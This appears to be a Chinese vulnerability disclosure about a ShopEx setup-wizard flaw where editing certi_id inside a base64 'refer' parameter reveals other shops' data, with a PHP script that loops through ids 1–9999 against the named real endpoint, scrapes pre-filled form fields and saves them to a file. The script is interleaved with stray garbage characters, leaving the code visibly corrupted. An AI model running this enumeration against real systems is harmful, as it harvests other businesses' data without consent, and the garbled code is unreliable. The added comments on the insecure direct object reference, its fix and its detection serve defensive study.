|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php
// Enumeration loop from the disclosure: walks certi_id 1..9999 and issues one
// request per value. From a defender's view this is the traffic shape to watch
// for — many sequential certi_id values from a single client in a short window
// against the wizard endpoint — and rate limiting there would blunt it.
for ($i=1; $i < 10000; $i++) { // enumerate certi_id values
& T4 K; h( R% ?, o' S, H7 G2 }1 f$ ^4 o# r
ShowshopExD($i);
$ q% p2 `# V3 r1 C$ b) I% ^- d% B. T& {, D# N" r2 h
}& d+ e& I9 ?8 }* B! O: i# i$ |% n
5 a4 q& ^! x5 V9 y$ v) l5 m$ g
/**
 * Proof-of-concept from the disclosure: fetches the ShopEx install-wizard
 * step2.php with a caller-chosen certi_id inside the base64 "refer" blob,
 * then dumps the name/value pairs of the text inputs the page pre-fills.
 *
 * Defender's reading: per the disclosure, the server resolves the record by
 * the certi_id it finds in the client-supplied refer parameter, so changing
 * that number selects another site's data (an insecure direct object
 * reference). base64 is a reversible encoding, not encryption, so swapping
 * the encoding does not close this; the fix is a server-side check that the
 * requested certi_id belongs to the authenticated caller, or a server-issued,
 * signed (e.g. HMAC) refer token that the server validates before use. For
 * detection, the calling loop produces many sequential certi_id values from
 * one client in a short window, which request logging and rate limiting on
 * this endpoint would surface.
 *
 * @param int $cid certificate id to request; passed through intval() below
 * @return void side effects: one HTTP GET, echo of each pair, append to c:/shopEx.txt
 */
function ShowshopExD($cid) {% g: e) [, P. ^4 K6 `
    // Target endpoint named in the disclosure.
8 {( A" M4 U; f! p) B) W* w, A9 b $url='http://guide.ecos.shopex.cn/step2.php'; s. X2 H) T2 J) ?+ v+ j5 `8 Z5 F
5 }) Q! u) j! ]6 G+ D
    // refer is base64 of a JSON object; only certi_id varies, callback_url is a dummy value.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
- g& R+ F% U/ D' z8 E! }& Z$ ^2 _" M4 w8 |4 K s
    // The blob travels as a plain query-string parameter.
$url = $url.'?refer='.$refer;
3 K |6 S' g; f$ {0 l) k8 ?7 L% o- u9 N
    // Plain GET; the body is returned as a string rather than printed.
$ch = curl_init($url);
" X& m& T9 m. E3 E, R' n) a! w
4 P& g l' g, W! i curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;2 B3 s5 ~8 X# R9 Q! F
( q# u! R7 S+ m# c, C8 _3 R9 L
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
1 K) I3 f' Q3 R; J, y% R7 C& \2 {" K" h$ {: y% l& m: J
$result = curl_exec($ch);
/ u, w2 J, {' N4 v/ F! H$ t. v ]6 U) V3 a
    // Converts the body from UTF-8 to gb2312 (the author's assumption about the response charset).
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
# V$ h/ J0 R! |7 k& k- y: p! j0 s5 ]5 Y
    // A response that echoes the refer blob back is treated as a hit.
0 h# D: g3 u" m% ?% x if(strpos($result,$refer))
8 z6 b# @: ? O2 {$ I
; _" \* \; Q& X1 O; i8 N3 J {
1 g! F5 @9 `: E8 ^+ |$ H' ?2 I) \( v
; L: a& T0 z- L, P8 n9 N $fp = fopen("c:/shopEx.txt",'ab'); // append results to a fixed local file
& v3 _, `' A c u5 G t; p/ n* x9 P5 \; t, Z( |
    // Collect the attribute text of every <input type="text" .../> element.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
( v I d! y8 W' p
( j1 m/ ^/ C0 U& O' ^% h foreach ($value[1] as $key) {
* }5 \$ x p+ q. r' Y, h
    // Pull name="..." and value="..." out of each input's attribute string.
) B% e1 J% c! i7 U preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);9 D2 O" } @" x; Y) }% A
& d% W8 Z. a, z/ v
    // Each pair is printed and written as "name:value" followed by CRLF.
echo $res[1][0].':'.$res[3][0]."\r\n";, S' ~4 O! D5 {5 h( N- |
' T8 {) O. G# ?/ G5 T
$col =$res[1][0].':'.$res[3][0]."\r\n"; 5 r& p; t! ^, J4 e0 t
- x( r! P9 J' B5 D! O( [
fwrite($fp, $col, strlen($col));
5 E; A8 b- D4 x! z& r. p* o4 g8 Y4 f
}3 A- m$ B! K t. W5 r- c
n( ~: g2 g# A% @: O5 J
    // Separator between records.
echo '--------------------------------'."\r\n";- x/ l, a4 G$ W$ m
2 \' ?( V, o0 c6 m9 I& m
    // The file handle is only opened and closed inside the hit branch.
fclose($fp);
/ y0 h5 t1 w/ d/ X4 c
- T" Y G& H; U, e9 d1 J }4 P% m% N$ c% l
# Z. }, {& v1 x* S( m0 q2 ^! s
    // Push buffered output, then release the curl handle.
flush();
) p; y# C9 S5 G2 m P) t8 g# ~7 O
curl_close($ch);$ x# H% D& ~7 D: |$ F
: a& G& a% g/ _; [! }1 u
}
- i3 F; J8 W- Q7 q P* F: C2 X?>4 J" G' |4 b' Y3 @$ A. [
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|